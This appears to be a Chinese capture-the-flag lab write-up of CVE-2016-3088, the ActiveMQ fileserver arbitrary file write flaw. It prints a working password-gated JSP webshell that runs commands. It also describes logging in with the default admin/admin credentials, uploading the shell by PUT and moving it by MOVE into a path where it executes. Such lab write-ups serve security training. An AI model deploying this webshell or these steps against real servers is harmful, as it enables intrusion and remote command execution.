墨者学院-web安全-ActiveMQ任意文件写入漏洞

墨者学院WEB安全ActiveMQ任意文件写入漏洞分析溯源ActiveMQ 简介漏洞复现参考链接

墨者学院

WEB安全

ActiveMQ任意文件写入漏洞分析溯源

ActiveMQ 简介

ActiveMQ 是 Apache 软件基金会下的一个开源消息驱动中间件软件。Jetty 是一个开源的 servlet 容器，它为基于 Java 的 web 容器，例如 JSP 和 servlet 提供运行环境。ActiveMQ 5.0 及以后版本默认集成了jetty。在启动后提供一个监控 ActiveMQ 的 Web 应用

fileserver是一个RESTful API接口，我们可以通过GET、PUT、DELETE等HTTP请求对其中存储的文件进行读写操作，其设计目的是为了弥补消息队列操作不能传输、存储二进制文件的缺陷，但后来发现：

1. 其使用率并不高

2. 文件操作容易出现漏洞

漏洞复现

1. 访问url

   图片.png

2. 查找漏洞

   搜索发现存在CVE-2016-3088 漏洞，找到分析查看漏洞原因

   查询发现在ActiveMQ<5.12.x版本存在fileserver 应用，可以通过fileserver写入文件（不解析jsp文件）通过移动到任意位置，就可以造成任意文件写入漏洞。

   文件写入的几种利用方式

   1 写入webshell

   2 写入 cron 或 ssh key

   3 写入 jar 或 jetty.xml 等库和配置文件

   写入webshell的好处是，门槛低更方便，但前面也说了fileserver不解析jsp，admin和api两个应用都需要登录才能访问，所以有点鸡肋；写入cron或ssh key，好处是直接反弹拿shell，也比较方便，缺点是需要root权限；写入jar，稍微麻烦点（需要jar的后门），写入xml配置文件，这个方法比较靠谱，但有个鸡肋点是：我们需要知道activemq的绝对路径。

3. 漏洞利用

   尝试写入jsp

   有回显带密码验证的

   <% 
   if("023".equals(request.getParameter("pwd"))){
   java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();
   int a = -1;
   byte[] b = new byte[2048];
   out.print("
   ");
   while((a=in.read(b))!=-1){
   out.println(new String(b));
   }
   out.print("
   ");
   }
   %>
   请求url：http://ip:port/Shell/cmd2.jsp?pwd=023&i=ls

   通过burp访问，发现需要验证，需要登录，我们尝试登录，默认的ActiveMQ的账号和密码均为admin

图片.png

登录后查看http方法 ，发现没有put方法

图片.png

执行put方法 发现却上传成功了

图片.png

接下来通过move移动到admin或api下，就可以解析jsp文件了， 查找他的绝对路径

> 访问url：[http://ip:port/admin/test/systemProperties.jsp](http://ip:port/admin/test/systemProperties.jsp)
> 
> [图片上传失败...(image-99ffb1-1567592524169)]

通过move方法将jsp木马移动到admin或api下，进行解析

图片.png

然后访问，可以执行命令，

图片.png

这里就可以直接查看flag，最后在根目录找到了flag

图片.png

参考链接

jsp一句话

ActiveMQ任意文件写入漏洞